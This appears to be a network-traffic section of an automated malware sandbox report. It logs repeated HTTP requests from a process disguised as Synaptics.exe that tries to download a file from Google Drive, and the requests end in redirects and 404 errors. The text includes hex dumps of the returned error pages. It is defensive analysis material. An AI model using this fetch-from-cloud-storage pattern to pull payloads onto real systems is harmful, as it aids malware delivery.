                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                66192.168.2.759895142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:28 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                67192.168.2.759892216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:28 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                68192.168.2.759902216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:29 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:29 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-xNicjmrTady4uHQqCiT4Kw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                69192.168.2.759903142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:29 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:29 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC5cBSJBlGNe2M338oyPRFCN61tusA-lRGTKtbbw9e1kjagFEnbLIwBdntMbz5RHFpitDB4vOqM
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:29 GMT
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-mxXBqobfgtbZ-Iz5KCR5dA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:29 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:29 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 78 70 2d 42 35 36 48 6d 62 42 4f 76 6c 47 74 75 71 43 4f 66 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="txp-B56HmbBOvlGtuqCOfw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:29 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                70192.168.2.759904216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:29 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:29 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-t1_n4T49q4FRF_5DpGiazA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                71192.168.2.759913216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:30 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:30 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-5bgS8gZohxK8DSKGuVkkVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                72192.168.2.759914216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:30 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:30 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-DH047w2IJKubAgVEupyO5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                73192.168.2.759915142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:30 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:30 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC5meiXpMvrWN1iWoBj4Ncap6ZIapy2pLnEw1jS2hqmvr8BttJwe2oq-JwBk1a1v9M31
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:30 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-IHEG3_KI7_Sg6CkDcqvJng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:30 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:30 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 58 63 62 43 58 39 75 77 5f 67 47 62 6a 37 6c 6e 76 71 30 79 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                Data Ascii: t Found)!!1</title><style nonce="9XcbCX9uw_gGbj7lnvq0yg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:30 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                74192.168.2.759912142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:30 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:30 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC5hcRaotB85awLW8Jb7XJOot674Y_mSH0E6TD5_9dTf53UufXllM-jPIO9VRAC2wkxQ
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:30 GMT
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-HEOajIdQRMJe3V6JNEx4qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:30 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:30 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 63 47 55 61 4a 31 45 52 41 69 45 39 50 39 78 65 4c 6a 63 36 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                Data Ascii: t Found)!!1</title><style nonce="YcGUaJ1ERAiE9P9xeLjc6g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
